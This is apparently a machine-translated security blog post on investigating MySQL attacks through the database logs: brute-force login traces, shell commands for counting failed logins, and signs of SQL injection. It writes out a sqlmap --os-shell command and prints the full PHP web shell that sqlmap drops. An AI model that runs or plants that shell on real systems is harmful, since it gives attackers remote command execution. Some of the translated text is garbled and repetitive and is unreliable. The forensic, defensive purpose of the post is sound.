Common database attacks include weak passwords, SQL injection, permission promotion, backup theft, etc. By analyzing the database logs, you can find the attack behavior, restore the attack scenario and trace the attack source.
0x01 Mysql Log Analysis
The General Query Log records successful connections and each query executed, and can be used as part of a security framework for failure analysis or post-hack investigation.
Show variables like '%general%'; SET GLOBAL general_log = 'On'; #SET GLOBAL general_log_file = '/var/lib/mysql.log ';Copy the codeFor example, when I visit /test.php? If id=1, we get this log:
190604 14:46:14 14 Connect root@localhost on
14 Init DB test
14 Query SELECT * FROM admin WHERE id = 1
14 Quit `
Copy the codeLet’s parse it by column:
The first column is the date column and the second column is the hour and minute column. The reason why this column is not displayed is that these SQL statements are executed almost simultaneously, so the Time is not recorded separately. The second column, Id, is the thread Id from the first column in show ProcessList. For long connections and time-consuming SQL statements, you can find out exactly which thread is running. In the third column, the operation type is Connect, and the operation type is Query. The operation type is Connect, and the operation type is Query. The following table describes the query operations performed after the query is connected to the database. The following table describes the query operations performed after the query is connected to the database.Copy the code0x02 Login Succeeded or Failed
Let’s do a simple test, using the weak password tool I developed before to scan, the dictionary Settings are relatively small, 2 users, 4 passwords, a total of 8 groups.
MySQL > log ()
Time Id Command Argument 190601 22:03:2098 Connect [email protected] on 98 Connect Access denied for user 'root' @ '192.168.204.1' (using password: YES) 103 Connect [email protected] on 103 Connect Access denied for user 'mysql'@'192.168.204.1' (using password: YES) 104 Connect [email protected] on 104 Connect Access denied for user 'mysql'@'192.168.204.1' (using password: YES) 100 Connect [email protected] on 101 Connect [email protected] on 101 Connect Access denied for user 'root' @ '192.168.204.1' (using password: YES) 99 Connect [email protected] on 99 Connect Access denied for user 'root'@'192.168.204.1' (using password: YES) 105 Connect [email protected] on 105 Connect Access denied for user 'mysql'@'192.168.204.1' (using password: YES) 100 Query set autocommit=0 102 Connect [email protected] on 102 Connect Access denied for user 'mysql'@'192.168.204.1' (using password: YES) 100 QuitCopy the codeDo you know which one was successful in guessing this password?
Using a demolition tool, a successful record of guessing a password looks something like this:
190601 22:03:20 100 Connect [email protected] on 100 Query set Autocommit =0 100 QuitCopy the codeHowever, if you do it the other way, it might be a little different.
Navicat for MySQL
190601 22:14:07 106 Connect [email protected] on
106 Query SET NAMES utf8
106 Query SHOW VARIABLES LIKE 'lower_case_%'
106 Query SHOW VARIABLES LIKE 'profiling'
106 Query SHOW DATABASES
Copy the codeCommand line login:
190601 22:17:25 111 Connect root@localhost on
111 Query select @@version_comment limit 1
190601 22:17:56 111 Quit
Copy the codeThe difference is that, for different database connection tools, the connection initialization process is different. With this difference, we can easily determine how the user is connecting to the database.
Also, login failures are recorded the same whether you are a blasting tool, Navicat for MySQL, or a command line.
Records of login failures:
102 Connect [email protected] on
102 Connect Access denied for user 'mysql'@'192.168.204.1' (using password: YES)
Copy the codeSimple analysis using shell commands:
# Which IP is blasting? Grep "Access denied" mysql. The log | the cut - d "'" - the f4 | uniq -c | sort - nr 192.168.204.1 # 27 blasting user name what are the dictionary? grep "Access denied" mysql.log |cut -d "'" -f2|uniq -c|sort -nr 13 mysql 12 root 1 root 1 mysqlCopy the codeIn log analysis, you need to pay special attention to sensitive operations, such as deleting tables, standby libraries, and reading and writing files. Key words: Drop table, drop function, Lock tables, unlock tables, load_file(), into outfile, into Dumpfile.
Mysql > SELECT * from mysql.user, SELECT * from mysql.func
0x03 SQL Injection Intrusion Trace
In the process of exploiting SQL injection vulnerability, we will try to use SQLMap’s — OS-shell parameter to obtain shell, if the operation is not done properly, some TEMPORARY tables and custom functions created by SQLMap may be left. Sqlmap OS-shell sqlmap OS-shell
Create a SQL injection point and enable Burp to listen on port 8080
Sqlmap. Py -u http://192.168.204.164/sql.php? Id = 1 - OS - the shell - proxy ` = http://127.0.0.1:8080Copy the codeHTTP communication process is as follows:
Create a temporary file tmpbwyov.php, execute system commands by accessing this Trojan, and return to the page display.
Tmpbwyov. PHP:
<? php $c=$_REQUEST["cmd"]; @set_time_limit(0); @ignore_user_abort(1); @ini_set('max_execution_time',0); $z=@ini_get('disable_functions'); if(! empty($z)){$z=preg_replace('/[, ]+/',',',$z); $z=explode(',',$z); $z=array_map('trim',$z); } else{$z=array(); }$c=$c." 2>&1\n"; function f($n) {global $z; return is_callable($n)and! in_array($n,$z); } if(f('system')){ob_start(); system($c); $w=ob_get_contents(); ob_end_clean(); } elseif(f('proc_open')) {$y=proc_open($c,array(array(pipe,r),array(pipe,w),array(pipe,w)),$t); $w=NULL; while(! feof($t[1])){$w.=fread($t[1],512); }@proc_close($y); } elseif(f('shell_exec')) {$w=shell_exec($c); }elseif(f('passthru')) {ob_start(); passthru($c); $w=ob_get_contents(); ob_end_clean(); } elseif(f('popen')){$x=popen($c,r); $w=NULL; if(is_resource($x)) {while(! feof($x)){$w.=fread($x,512); }}@pclose($x); }elseif(f('exec')) {$w=array(); exec($c,$w); $w=join(chr(10),$w).chr(10); }else{$w=0; } print "<pre>".$w."</pre>"; ? > `Copy the codeCreate a temporary table SQLMAPOutput, call the stored procedure to execute the system command to write data to the temporary table, and then fetch the data in the temporary table to display to the front end.
By viewing the suspicious files newly created in the website directory, you can determine whether SQL injection vulnerability attacks have occurred.
Inspection Method:
1, check the website directory, whether there are some Trojan files:
2. Check whether there are traces of UDF and MOF lifting rights
Check whether abnormal files exist in the directory
mysql\lib\plugin
c:/windows/system32/wbem/mof/
Check whether the function is deleted
select * from mysql.func
3. Combine web log analysis.
Well, the log analysis series has been updated, next week we will share “Linux In Action”, welcome to follow + like ~